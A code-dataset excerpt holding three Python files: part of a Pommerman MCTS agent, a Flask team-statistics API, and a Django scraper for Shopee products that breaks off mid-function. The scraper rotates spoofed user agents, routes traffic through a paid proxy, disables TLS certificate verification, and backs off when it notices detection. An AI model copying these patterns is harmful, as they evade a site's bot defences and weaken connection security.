= position[1]\n if action == Action.Bomb.value:\n #print(\"agent.agent_id=\", agent.agent_id, \"agent.blast_strength=\", agent.blast_strength)\n ## if ammo is 0 
you cannot lay bombs\n if agent.ammo == 0:\n return False\n # if it a bomb move, check if there is already a bomb planted on this field\n if (row, col) in bombs:\n return False\n bomb_can_destroy_a_wooden_wall(board, position, agent.blast_strength)\n\n if action == Action.Up.value:\n row -= 1\n elif action == Action.Down.value:\n row += 1\n elif action == Action.Left.value:\n col -= 1\n elif action == Action.Right.value:\n col += 1\n\n if row < 0 or row >= len(board) or col < 0 or col >= len(board):\n return False\n\n if board[row, col] in [Item.Wood.value, Item.Rigid.value]:\n return False\n\n # own adding that agent cannot go on boms when he cant kick, or when he can kick, but bomb is at a wall\n if board[row, col] == Item.Bomb.value:\n if not agent.can_kick:\n return False\n else:\n # if bomb lays on a wall or at the outer border we cannot cick it\n if action == Action.Up.value and (row == 0 or board[row-1, col] in [Item.Wood.value, Item.Rigid.value]): #TODO maybe add enemy here because we cant kick if enemy standst there?\n return False\n elif action == Action.Down.value and (row == len(board)-1 or board[row+1, col] in [Item.Wood.value, Item.Rigid.value]):\n return False\n elif action == Action.Left.value and (col == 0 or board[row, col-1] in [Item.Wood.value, Item.Rigid.value]):\n return False\n elif action == Action.Right.value and (col == len(board)-1 or board[row, col+1] in [Item.Wood.value, Item.Rigid.value]):\n return False\n\n return True\n\n def find_children(self):\n \"\"\" expands all children \"\"\"\n for actions in self.action_combinations:\n if actions not in self.children.keys():\n self.children[actions] = self._forward(actions)\n\n def _forward(self, actions):\n \"\"\" applies the actions to obtain the next game state \"\"\"\n # since the forward model directly modifies the parameters, we have to provide copies\n board = copy.deepcopy(self.state[0])\n agents = _copy_agents(self.state[1])\n bombs = _copy_bombs(self.state[2])\n items = 
copy.deepcopy(self.state[3])\n flames = _copy_flames(self.state[4])\n board, curr_agents, curr_bombs, curr_items, curr_flames = ForwardModel.step(\n actions,\n board,\n agents,\n bombs,\n items,\n flames\n )\n return Node([board, curr_agents, curr_bombs, curr_items, curr_flames], self.agent_id)\n\n def find_random_child(self):\n \"\"\" returns a random child, expands the child if it was not already done \"\"\"\n actions = random.choice(self.action_combinations)\n if actions in self.children.keys():\n return self.children[actions]\n else:\n child = self._forward(actions)\n return child\n\n def get_children(self):\n return self.children\n\n def get_unexplored(self):\n \"\"\" returns a randomly chosen unexplored action pair, or None \"\"\"\n unexplored_actions = [actions for actions in self.action_combinations if actions not in self.children.keys()]\n if not unexplored_actions:\n return None\n actions = random.choice(unexplored_actions)\n child = self._forward(actions)\n self.children[actions] = child\n return child\n\n def is_terminal(self):\n alive = [agent for agent in self.state[1] if agent.is_alive]\n return len(alive) != 2\n\n def get_total_reward(self):\n \"\"\" Returns Total reward of node (Q) \"\"\"\n return self.total_reward\n\n def incr_reward(self, reward):\n \"\"\" Update reward of node in backpropagation step of MCTS \"\"\"\n self.total_reward += reward\n\n def get_visit_count(self):\n \"\"\" Returns Total number of times visited this node (N) \"\"\"\n return self.visit_count\n\n def incr_visit_count(self):\n self.visit_count += 1\n\n def reward(self, root_state):\n # we do not want to role out games until the end,\n # since pommerman games can last for 800 steps, therefore we need to define a value function,\n # which assigns a numeric value to state (how \"desirable\" is the state?)\n return _value_func(self.state, root_state, self.agent_id)\n\n\ndef manhattan_dist(pos1, pos2):\n return abs(pos1[0] - pos2[0]) + abs(pos1[1] - pos2[1])\n\n\ndef 
_value_func(state, root_state, agent_id):\n # TODO: here you need to assign a value to a game state, for example the evaluation can\n # be based on the number of blasted clouds, the number of collected items the distance to the opponent, ...\n # an example how a numerical value can be derived:\n board = state[0]\n agents = state[1]\n own_agent = agents[agent_id]\n opponent_agent = agents[1-agent_id]\n root_own_agent = root_state[1][agent_id]\n assert own_agent, root_own_agent\n # check if own agent is dead\n if not own_agent.is_alive:\n return -1.0\n # check if opponent has been destroyed\n elif not opponent_agent.is_alive:\n return 1.0\n\n score = 0.0 # game is not over yet, we have to think about additional evaluation criteria\n\n own_position = own_agent.position\n opponent_position = opponent_agent.position\n\n # if agent cannot move in any direction than its locked up either by a bomb,\n # or the opponent agent -> very bad position\n down_cond = own_position[0] + 1 >= len(board) or \\\n board[own_position[0] + 1][own_position[1]] not in ACCESSIBLE_TILES\n up_cond = own_position[0] - 1 < 0 or \\\n board[own_position[0] - 1][own_position[1]] not in ACCESSIBLE_TILES\n right_cond = own_position[1] + 1 >= len(board) or \\\n board[own_position[0]][own_position[1] + 1] not in ACCESSIBLE_TILES\n left_cond = own_position[1] - 1 < 0 or \\\n board[own_position[0]][own_position[1] - 1] not in ACCESSIBLE_TILES\n\n if down_cond and up_cond and right_cond and left_cond:\n score += -0.5\n\n # we want to push our agent towards the opponent\n man_dist = manhattan_dist(own_position, opponent_position)\n score += 0.005*(10-man_dist) # the closer to the opponent the better\n\n # we want to collect items (forward model was modified to make this easier)\n score += own_agent.picked_up_items * 0.05\n\n # since search depth is limited, we need to reward well placed bombs instead\n # of only rewarding collecting items\n for bomb in state[2]:\n # we only reward bombs placed next to wood 
- you can improve this\n loc = bomb.position\n if loc[0]-1 >= 0 and board[loc[0]-1][loc[1]] == Item.Wood.value:\n score += 0.02\n if loc[0]+1 < len(board) and board[loc[0]+1][loc[1]] == Item.Wood.value:\n score += 0.02\n if loc[1]-1 >= 0 and board[loc[0]][loc[1]-1] == Item.Wood.value:\n score += 0.02\n if loc[1]+1 < len(board) and board[loc[0]][loc[1]+1] == Item.Wood.value:\n score += 0.02\n return score\n\n\ndef _copy_agents(agents_to_copy):\n \"\"\" copy agents of the current node \"\"\"\n agents_copy = []\n for agent in agents_to_copy:\n agt = DummyAgent()\n agt.init_agent(agent.agent_id, constants.GameType.FFA)\n agt.set_start_position(agent.position)\n agt.reset(\n ammo=agent.ammo,\n is_alive=agent.is_alive,\n blast_strength=agent.blast_strength,\n can_kick=agent.can_kick\n )\n agt.picked_up_items = agent.picked_up_items\n agents_copy.append(agt)\n return agents_copy\n\n\ndef _copy_bombs(bombs):\n \"\"\" copy bombs of the current node \"\"\"\n bombs_copy = []\n for bomb in bombs:\n bomber = characters.Bomber()\n bombs_copy.append(\n characters.Bomb(bomber, bomb.position, bomb.life, bomb.blast_strength,\n bomb.moving_direction)\n )\n\n return bombs_copy\n\n\ndef _copy_flames(flames):\n \"\"\" copy flames of the current node \"\"\"\n flames_copy = []\n for flame in flames:\n flames_copy.append(\n characters.Flame(flame.position, flame.life)\n )\n return flames_copy\n","sub_path":"student_agents/group05/group05/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":11307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"408269542","text":"'''\n@author: Dallas Fraser\n@author: 2016-04-12\n@organization: MLSB API\n@summary: The views for player stats\n'''\nfrom flask_restful import Resource, reqparse\nfrom flask import Response\nfrom json import dumps\nfrom api import DB\nfrom api.model import Team, Game\nfrom datetime import datetime, date, time\nfrom sqlalchemy import or_\nparser = 
reqparse.RequestParser()\nparser.add_argument('year', type=int)\nparser.add_argument('league_id', type=int)\nparser.add_argument('team_id', type=int)\n\n\ndef post(team_id, year, league_id):\n if team_id is not None:\n team = single_team(team_id)\n else:\n team = team_stats(year, league_id)\n return team\n\n\ndef single_team(team_id):\n team_query = Team.query.get(team_id)\n if team_query is None:\n return {}\n games = (DB.session.query(Game)\n .filter(or_(Game.away_team_id == team_id,\n Game.home_team_id == team_id)\n ).all())\n team = {team_id: {'wins': 0,\n 'losses': 0,\n 'games': 0,\n 'ties': 0,\n 'runs_for': 0,\n \"runs_against\": 0,\n 'hits_for': 0,\n 'hits_allowed': 0,\n 'name': str(team_query)}\n }\n for game in games:\n # loop through each game\n scores = game.summary()\n if game.away_team_id == team_id:\n score = scores['away_score']\n hits = scores['away_bats']\n opp = scores['home_score']\n opp_hits = scores['home_bats']\n else:\n score = scores['home_score']\n hits = scores['home_bats']\n opp = scores['away_score']\n opp_hits = scores['away_bats']\n if score > opp:\n team[team_id]['wins'] += 1\n elif score < opp:\n team[team_id]['losses'] += 1\n elif scores['home_bats'] + scores['away_bats'] > 0:\n team[team_id]['ties'] += 1\n team[team_id]['runs_for'] += score\n team[team_id]['runs_against'] += opp\n team[team_id]['hits_for'] += hits\n team[team_id]['hits_allowed'] += opp_hits\n team[team_id]['games'] += 1\n return team\n\n\ndef team_stats(year, league_id):\n t = time(0, 0)\n games = DB.session.query(Game)\n teams = DB.session.query(Team)\n if year is not None:\n d1 = date(year, 1, 1)\n d2 = date(year, 12, 30)\n start = datetime.combine(d1, t)\n end = datetime.combine(d2, t)\n games = games.filter(Game.date.between(start, end))\n teams = teams.filter(Team.year == year)\n if league_id is not None:\n games = games.filter(Game.league_id == league_id)\n teams = teams.filter(Team.league_id == league_id)\n result = {}\n for team in teams:\n # initialize 
each team\n result[team.id] = {'wins': 0,\n 'losses': 0,\n 'games': 0,\n 'ties': 0,\n 'runs_for': 0,\n \"runs_against\": 0,\n 'hits_for': 0,\n 'hits_allowed': 0,\n 'name': str(team)}\n for game in games:\n # loop through each game (max ~400 for a season)\n score = game.summary()\n result[game.away_team_id]['runs_for'] += score['away_score']\n result[game.away_team_id]['runs_against'] += score['home_score']\n result[game.away_team_id]['hits_for'] += score['away_bats']\n result[game.away_team_id]['hits_allowed'] += score['home_bats']\n result[game.home_team_id]['runs_for'] += score['home_score']\n result[game.home_team_id]['runs_against'] += score['away_score']\n result[game.home_team_id]['hits_for'] += score['home_bats']\n result[game.home_team_id]['hits_allowed'] += score['away_bats']\n if score['away_bats'] + score['home_bats'] > 0:\n result[game.away_team_id]['games'] += 1\n result[game.home_team_id]['games'] += 1\n if score['away_score'] > score['home_score']:\n result[game.away_team_id]['wins'] += 1\n result[game.home_team_id]['losses'] += 1\n elif score['away_score'] < score['home_score']:\n result[game.home_team_id]['wins'] += 1\n result[game.away_team_id]['losses'] += 1\n elif score['away_bats'] + score['home_bats'] > 0:\n result[game.home_team_id]['ties'] += 1\n result[game.away_team_id]['ties'] += 1\n return result\n\n\nclass TeamStatsAPI(Resource):\n def post(self):\n \"\"\"\n GET request for Team Stats List\n Route: Route['player_stats']\n Parameters:\n year: the year (int)\n team_id: the team id (int)\n league_id: the league id (int)\n Returns:\n status: 200\n mimetype: application/json\n data: list of Teams\n \"\"\"\n year = None\n args = parser.parse_args()\n if args['team_id']:\n tid = args['team_id']\n team = post(tid, None, None)\n else:\n if args['year']:\n year = args['year']\n else:\n year = None\n if args['league_id']:\n league_id = args['league_id']\n else:\n league_id = None\n team = post(None, year, league_id)\n return 
Response(dumps(team),\n status=200,\n mimetype=\"application/json\")\n","sub_path":"api/advanced/team_stats.py","file_name":"team_stats.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"568864900","text":"import os_setup\nimport threading\nimport os\nfrom random import randint\n\nimport requests\nfrom urllib3.exceptions import InsecureRequestWarning\n\nimport json\nimport time\nimport datetime\nimport pytz\nfrom random import choice\nfrom django.db.models import Q\nimport multiprocessing as mp\nfrom utils.slack import slack_notify\nfrom product.models import Product, ShopeeRating, ProductImage, ShopeeCategory,\\\n ProductSize, ProductColor, ProductExtraOption, ProductOption, ProductPattern,\\\n ShopeeColor, ShopeeSize, SourceExtraOption\nfrom helper.get_proxy_session import get_session\nfrom helper.clean_text import get_cleaned_text_from_color,\\\n get_cleaned_text, get_cleaned_text_from_pattern, \\\n get_cleaned_text_from_category, get_cleaned_text_from_size\nfrom django.shortcuts import get_object_or_404\nfrom store.models import Store, StorePost\n\n\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n_user_agents = [\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1',\n 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Mobile Safari/537.36',\n 'Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36',\n 'Mozilla/5.0 (Linux; Android 6.0; HTC One X10 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.98 Mobile Safari/537.36',\n 'Mozilla/5.0 (iPhone; CPU 
iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1',\n 'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',\n 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1'\n]\n\n\nclass ShopeeScraper:\n def __init__(self, user_agents=None, proxy=None):\n self.user_agents = user_agents\n proxy_host = \"proxy.crawlera.com\"\n proxy_port = \"8010\"\n proxy_auth = os.environ.get('CRAWLERA_API_KEY')\n proxies = {\"https\": \"https://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port),\n \"http\": \"http://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port)}\n\n self.session = requests.Session()\n self.session.proxies.update(proxies)\n self.session.headers.update({'User-Agent': self.__random_agent(),\n 'X-Requested-With': 'XMLHttpRequest',\n })\n self.proxies = proxies\n self.session_refresh_count = 0\n\n def change_session(self):\n if self.session_refresh_count > 5:\n new_session, self.proxies = get_session('new')\n self.session_refresh_count = 0\n else:\n new_session, self.proxies = get_session(proxies=self.proxies)\n self.session = new_session\n self.session_refresh_count += 1\n return new_session\n\n def __random_agent(self):\n if self.user_agents and isinstance(self.user_agents, list):\n return choice(self.user_agents)\n return choice(_user_agents)\n\n def __request_url(self, store_id, limit='100', newest='0'):\n url = 'https://shopee.vn/api/v2/search_items/?by=pop&limit={limit}&match_id={store_id}&newest={newest}&order=desc&page_type=shop&shop_categoryids=&version=2'.format(\n limit=limit, store_id=store_id, newest=newest)\n # proxy_host = \"proxy.crawlera.com\"\n # proxy_port = \"8010\"\n # proxy_auth = os.environ.get('CRAWLERA_API_KEY')+':'\n # proxies = {\"https\": 
\"https://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port),\n # \"http\": \"http://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port)}\n # headers = {'X-Crawlera-Profile': 'desktop',\n # 'X-Crawlera-JobId': '999',\n # 'X-Crawlera-Max-Retries': '1',\n # 'Referer': 'https://shopee.vn/shop/{store_id}/search'.format(store_id=store_id),\n # }\n # try:\n # response = requests.get(url, proxies=proxies, verify=False,\n # headers=headers)\n headers = {'User-Agent': choice(_user_agents),\n 'X-Requested-With': 'XMLHttpRequest',\n 'Referer': 'https://shopee.vn/shop/{store_id}/search?shopCollection='.format(store_id=store_id),\n }\n try:\n response = requests.get(url, headers=headers)\n # response.raise_for_status()\n except requests.HTTPError as e:\n print(e)\n pass\n except requests.RequestException:\n pass\n else:\n return response\n\n def __request_url_item(self, store_id, item_id):\n url = \"https://shopee.vn/api/v2/item/get?itemid={item_id}&shopid={store_id}\".format(item_id=item_id, store_id=store_id)\n proxy_host = \"proxy.crawlera.com\"\n proxy_port = \"8010\"\n proxy_auth = os.environ.get('CRAWLERA_API_KEY')+':'\n proxies = {\"https\": \"https://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port),\n \"http\": \"http://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port)}\n headers = {'X-Crawlera-Profile': 'desktop',\n 'X-Crawlera-JobId': '999',\n 'X-Crawlera-Max-Retries': '1',\n 'Referer': 'https://shopee.vn/shop/' +\n str(store_id) +\n '/search',\n }\n try:\n response = requests.get(url,\n proxies=proxies,\n verify=False,\n headers=headers, timeout=10)\n response.raise_for_status()\n except requests.HTTPError as e:\n print(e)\n pass\n except requests.RequestException:\n pass\n else:\n return response\n\n def __update_category(self, obj_product, categories):\n for category in categories:\n if category:\n obj_cat, is_created = ShopeeCategory.objects.get_or_create(catid=int(category['catid']),\n display_name=category['display_name'])\n 
obj_product.shopee_category.add(obj_cat)\n obj_cat.no_sub = category['no_sub']\n obj_cat.is_valid = category['no_sub']\n obj_cat.is_default_subcat = category['is_default_subcat']\n obj_cat.save()\n # is_valid -> 최하위 카테고리 & 분류 된 상태\n if obj_cat.is_valid:\n if obj_cat.category:\n obj_product.category = obj_cat.category\n if obj_cat.sub_category:\n obj_product.sub_category = obj_cat.sub_category\n\n if obj_product.sub_category is None:\n obj_product.validation = 'R' # 카테고리 정상 분류시 Review 로 표시\n\n def __update_rating(self, obj_product, data, view_count=0):\n obj_rating, is_created = ShopeeRating.objects.get_or_create(\n product=obj_product)\n if data['liked_count']:\n obj_rating.shopee_liked_count = data['liked_count']\n if data['historical_sold']:\n obj_rating.shopee_sold_count = data['historical_sold']\n obj_rating.shopee_view_count = view_count\n if data['item_rating']['rating_star']:\n obj_rating.shopee_rating_star = data['item_rating']['rating_star']\n if data['item_rating']['rating_count']:\n obj_rating.shopee_5_star_count = data['item_rating']['rating_count'][0]\n obj_rating.shopee_4_star_count = data['item_rating']['rating_count'][1]\n obj_rating.shopee_3_star_count = data['item_rating']['rating_count'][2]\n obj_rating.shopee_2_star_count = data['item_rating']['rating_count'][3]\n obj_rating.shopee_1_star_count = data['item_rating']['rating_count'][4]\n obj_rating.shopee_review_count = data['item_rating']['rating_count'][0]+data['item_rating']['rating_count'][1] + \\\n data['item_rating']['rating_count'][2]+data['item_rating']['rating_count'][3] + \\\n data['item_rating']['rating_count'][4]\n obj_rating.save()\n\n def __update_extra_options(self, obj_product, variation):\n options = variation['options']\n images = variation['images']\n variation_group = variation['name']\n for key, option in enumerate(options):\n option_string = option.lower().strip()\n try:\n source = 'https://cf.shopee.vn/file/' + \\\n variation['images'][key]\n source_thumb = 
'https://cf.shopee.vn/file/' + \\\n variation['images'][key]+'_tn'\n except:\n source = None\n source_thumb = None\n obj_extra_option, is_created = SourceExtraOption.objects.get_or_create(\n name=option_string, source=source, source_thumb=source_thumb, variation_group=variation_group)\n obj_product.source_extra_option.add(obj_extra_option)\n\n def __update_size(self, obj_product, options):\n for option in options:\n cleaned_text = get_cleaned_text(option)\n cleaned_text = get_cleaned_text_from_category(\n get_cleaned_text_from_pattern(get_cleaned_text_from_color(cleaned_text)))\n obj_size, is_created = ShopeeSize.objects.get_or_create(\n display_name=cleaned_text)\n obj_product.shopee_size.add(obj_size)\n for size_obj in obj_product.shopee_size.all():\n if size_obj.size:\n obj_product.size.add(size_obj.size)\n else: # 사이즈 정보 중 없는 정보가 있으면 R로 변경\n obj_product.validation = 'R'\n\n def __update_color(self, obj_product, options):\n for option in options:\n cleaned_text = get_cleaned_text(option)\n cleaned_text = get_cleaned_text_from_category(\n get_cleaned_text_from_pattern(get_cleaned_text_from_size(cleaned_text)))\n obj_color, is_created = ShopeeColor.objects.get_or_create(\n display_name=cleaned_text)\n obj_product.shopee_color.add(obj_color)\n for color_obj in obj_product.shopee_color.all():\n if color_obj.color:\n obj_product.color.add(color_obj.color)\n else: # 사이즈 정보 중 없는 정보가 있으면 R로 변경\n obj_product.validation = 'R'\n\n def __update_product_option(self, obj_product, option_list,\n color_index, size_index, has_extra_options):\n free_size_obj = ProductSize.objects.get(name='free')\n u_color_obj = ProductColor.objects.get(name='undefined')\n u_size_obj = ProductSize.objects.get(name='undefined')\n # 옵션이 없는 경우 FREE SIZE OPTION 생성\n if len(option_list) == 0:\n obj_option, is_created = ProductOption.objects.get_or_create(\n product=obj_product, shopee_item_id=obj_product.shopee_item_id)\n obj_option.stock = obj_product.stock\n if obj_product.stock > 0:\n 
obj_option.is_active = True\n obj_product.is_active = True\n obj_product.validation = 'V'\n else:\n obj_option.is_active = False\n obj_option.original_price = obj_product.original_price\n obj_option.discount_price = obj_product.discount_price\n obj_option.currency = obj_product.currency\n obj_option.size = free_size_obj\n obj_option.save()\n else:\n not_valid_information = False\n for option in option_list:\n obj_option, is_created = ProductOption.objects.get_or_create(\n product=obj_product,\n shopee_item_id=option['modelid'])\n if is_created:\n # 옵션 생성 후에는 기본 옵션 정보 선택이 필요.\n if color_index is None and size_index is None:\n if len(option_list) == 1:\n if option['name'] == '':\n obj_option.name = 'default option(ONE SIZE)'\n else:\n obj_option.name = option['name']\n obj_option.size = free_size_obj\n obj_option.color = u_color_obj\n else:\n not_valid_information = True\n break\n else:\n obj_option.name = option['name']\n splited_list = option['name'].lower().split(',')\n if color_index != None:\n cleaned_text = get_cleaned_text(splited_list[color_index])\n cleaned_text = get_cleaned_text_from_category(\n get_cleaned_text_from_pattern(get_cleaned_text_from_size(cleaned_text)))\n obj_color, is_created = ShopeeColor.objects.get_or_create(\n display_name=get_cleaned_text(cleaned_text))\n if obj_color.color:\n obj_option.color = obj_color.color\n else:\n obj_product.validation = 'R'\n not_valid_information = True\n break\n else:\n obj_option.color = u_color_obj\n\n if size_index != None:\n cleaned_text = get_cleaned_text(splited_list[size_index])\n cleaned_text = get_cleaned_text_from_category(\n get_cleaned_text_from_pattern(get_cleaned_text_from_color(cleaned_text)))\n obj_size, is_created = ShopeeSize.objects.get_or_create(\n display_name=cleaned_text)\n if obj_size.size:\n obj_option.size = obj_size.size\n else:\n obj_product.validation = 'R'\n not_valid_information = True\n break\n else:\n obj_option.size = u_size_obj\n obj_option.is_active = option['status']\n if 
option['price_before_discount'] > 0:\n obj_option.original_price = option['price_before_discount'] / 100000\n obj_option.discount_price = option['price'] / 100000\n else:\n obj_option.original_price = option['price'] / 100000\n obj_option.discount_price = 0\n obj_option.currency = option['currency']\n obj_option.stock = option['stock']\n if option['stock'] == 0:\n obj_option.is_active = False\n obj_option.shopee_sold_count = option['sold']\n try:\n obj_option.save()\n except:\n not_valid_information = True\n\n if has_extra_options or not_valid_information:\n for option in option_list:\n obj_option, is_created = ProductOption.objects.get_or_create(\n product=obj_product, shopee_item_id=option['modelid'])\n obj_option.name = option['name']\n obj_option.extra_option = option['name']\n if len(option_list) == 1 and option['name'] == '':\n obj_option.name = obj_product.name\n obj_option.extra_option = obj_product.name\n obj_option.size = u_size_obj\n obj_option.color = u_color_obj\n obj_option.is_active = option['status']\n if option['price_before_discount'] > 0:\n obj_option.original_price = option['price_before_discount'] / 100000\n obj_option.discount_price = option['price'] / 100000\n else:\n obj_option.original_price = option['price'] / 100000\n obj_option.currency = option['currency']\n obj_option.stock = option['stock']\n if option['stock'] == 0:\n obj_option.is_active = False\n obj_option.shopee_sold_count = option['sold']\n try:\n obj_option.save()\n except:\n obj_product.validation = 'R'\n\n def __update_price(self, obj_product, data):\n if data['show_discount'] == 0:\n obj_product.is_discount = False\n obj_product.original_price = data['price'] / 100000\n obj_product.discount_price = 0\n obj_product.discount_rate = 0\n obj_product.currency = data['currency']\n else:\n obj_product.is_discount = True\n # price_max_before_discount #price_before_discount\n obj_product.original_price = data['price_before_discount'] / 100000\n obj_product.discount_price = 
data['price'] / 100000\n obj_product.discount_rate = data['show_discount']\n obj_product.currency = data['currency']\n if (obj_product.original_price == 0 or obj_product.discount_price == 0):\n slack_notify('something wrong with ' + str(obj_product.pk))\n if (data['show_free_shipping']):\n obj_product.is_free_ship = data['show_free_shipping']\n obj_product.shipping_price = 0\n else:\n obj_product.shipping_price = None\n\n def __update_pattern(self, obj_product):\n pattern_list = ProductPattern.objects.all()\n for pattern_obj in pattern_list:\n name_string = get_cleaned_text(obj_product.name)\n if get_cleaned_text(pattern_obj.name) in name_string or get_cleaned_text(pattern_obj.display_name) in name_string:\n obj_product.pattern.add(pattern_obj)\n\n def __update_images(self, obj_product, data, is_created=True):\n obj_product.product_thumbnail_image = 'https://cf.shopee.vn/file/' + \\\n data['image'] + '_tn'\n if (is_created == False):\n previous_images = ProductImage.objects.filter(product=obj_product)\n for previous_image in previous_images:\n previous_image.delete()\n for product_image in data['images']:\n obj_image, image_is_created = ProductImage.objects.get_or_create(\n source='https://cf.shopee.vn/file/' + product_image,\n source_thumb='https://cf.shopee.vn/file/' + product_image+'_tn',\n product=obj_product,\n post_image_type='P')\n\n def get_or_create_product(self, store_obj, itemid, view_count=None):\n shopid = store_obj.shopee_numeric_id\n result = ''\n # 0. 상품 생성 및 호출\n # time.sleep(randint(0, 2))\n obj_product, is_created = Product.objects.get_or_create(\n shopee_item_id=itemid, store=store_obj)\n # print('https://dabivn.com/admin/product/product/'+str(obj_product.pk))\n # 0. 
상품 json load & 정상 데이터인지 확인\n data = self.__request_url_item(shopid, itemid).json()['item']\n if data['price'] % 100 != 0:\n print(data['price'])\n print('error')\n time.sleep(600)\n slack_notify('Crawler is caught by Shopee')\n return\n else:\n print(shopid, ' ', itemid, ' ', end='')\n print('0')\n # 1. 상품 삭제 확인\n if data == None:\n result = 'd'\n print('d', end='')\n obj_product.is_active = False\n obj_product.validation = 'D'\n obj_product.name = '[DELETED FROM SOURCE PAGE]' + obj_product.name\n obj_product.save()\n else:\n # TODO 재고 재 생성 확인을 해야함.\n # 2. 신규 생성 상품 처리\n color_index = None\n size_index = None\n has_extra_options = False\n if is_created:\n # 2. 기본 정보 업데이트 (상품 링크 / 상품 생성 시간 / 상품 분류 / 이름 / 이미지)\n result = 'N'\n print('N', end='')\n obj_product.validation = 'V'\n self.__update_category(obj_product, data['categories'])\n obj_product.product_link = store_obj.shopee_url + '/' + str(itemid)\n obj_product.created_at = datetime.datetime.fromtimestamp(\n int(data['ctime']), pytz.UTC)\n obj_product.product_source = 'SHOPEE'\n obj_product.name = data['name']\n obj_product.description = data['description']\n # image\n self.__update_images(obj_product, data, is_created)\n # 2. 상품 사이즈 / 컬러 정보 업데이트\n if (data['size_chart'] != None):\n obj_product.size_chart = 'https://cf.shopee.vn/file/' + data['size_chart']\n for i, variation in enumerate(data['tier_variations']):\n variation_name = variation['name'].replace(' ', '').replace(':', '').lower().strip()\n if 'size' in variation_name or 'kích' in variation_name or 'kich' in variation_name:\n self.__update_size(obj_product, variation['options'])\n size_index = i\n elif 'màu' in variation_name or 'color' in variation_name or 'mau' in variation_name:\n self.__update_color(obj_product, variation['options'])\n color_index = i\n else:\n self.__update_extra_options(obj_product, variation)\n has_extra_options = True\n if obj_product.size.count() == 0:\n self.__update_size(obj_product, ['free'])\n # 2. 
패턴 추가\n self.__update_pattern(obj_product)\n else:\n result = 'u'\n if (obj_product.product_thumbnail_image != 'https://cf.shopee.vn/file/' +\n data['image'] + '_tn'):\n result = 'i'\n print('i', end='')\n self.__update_images(obj_product, data, False)\n # 3. 기존 / 신규 상품 업데이트\n # 3. 가격 및 레이팅 업데이트\n obj_product.updated_at = datetime.datetime.now()\n self.__update_price(obj_product, data)\n if view_count:\n self.__update_rating(obj_product, data, view_count)\n\n # 3. 재고 및 품절 처리\n obj_product.stock = data['stock']\n if (obj_product.stock == 0):\n obj_product.is_active = False\n obj_product.stock_available = False\n else:\n obj_product.stock_available = True\n\n # 4. 옵션 생성 및 업데이트\n self.__update_product_option(obj_product, data['models'], color_index, size_index, has_extra_options)\n obj_product.save()\n\n # 5. 생성 후 최종 검증\n if is_created:\n obj_product.is_active = False\n obj_product.save()\n return obj_product, result\n\n def search_store(self, store_obj):\n i = 0\n pk = 0\n list_length = 100\n store_id = store_obj.insta_id\n while list_length == 100:\n try:\n try_count = 0\n while True and try_count < 1:\n try_count += 1\n try:\n response = self.__request_url(store_id=store_obj.shopee_numeric_id,\n limit=list_length, newest=i*100)\n product_list = response.json()['items']\n break\n except:\n time.sleep(10)\n print('R', end='')\n for j, product in enumerate(product_list):\n try_count = 0\n while True and try_count < 10:\n try:\n product_obj, result = self.get_or_create_product(\n store_obj, product['itemid'], product['view_count'])\n break\n except:\n print('r', end='')\n # new_session = self.change_session()\n try_count += 1\n pk += 1\n list_length = len(product_list)\n i = i+1\n except:\n print('\\nERROR\\n')\n # slack_notify('Failed to get product list from {} {} ~ {}'.format(store_obj.insta_id, i * 100, (i + 1) * 100))\n break\n return pk\n#\n\n def refactor_search_store(self, store_obj):\n i = 0\n empty_result = 0\n result_string = ''\n store_id = 
store_obj.insta_id\n while empty_result < 3:\n # time.sleep(1+randint(0, 5)) 문제 없었음\n # time.sleep(1+randint(0, 2)) 문제 없었음\n time.sleep(1+randint(0, 1))\n try:\n response = self.__request_url(store_id=store_obj.shopee_numeric_id,\n limit=1, newest=i)\n if (len(response.json()['items']) == 1):\n product_json = response.json()['items'].pop()\n product_obj, result = self.get_or_create_product(\n store_obj, product_json['itemid'], product_json['view_count'])\n result_string = result_string+result\n else:\n empty_result += 1\n except:\n print('R', end='')\n i = i + 1\n # time.sleep(randint(0, 2))\n return i, result_string\n\n\ndef update_shopee(start_index=0, end_index=None, reverse=False):\n obj = ShopeeScraper()\n store_list = Store.objects.filter(store_type='IS').filter(is_active=True)[start_index + 1:end_index]\n results_string = 'update shopee from ' + str(start_index)\n if (end_index):\n results_string += ' to ' + str(end_index)\n for i, store_obj in enumerate(store_list):\n print(\"\\n#\" + str(i) + ' update ' + str(store_obj) + ' ')\n results_string = results_string+(\"\\n#\" + str(i) + ' update ' + str(store_obj))\n try:\n updated, result_string = obj.refactor_search_store(store_obj)\n results_string = results_string+result_string.replace('uuuuuuuuuu', 'U').replace('UUUUU', '5')\n except:\n slack_notify('Failed to update store {}'.format(store_obj.insta_id))\n # 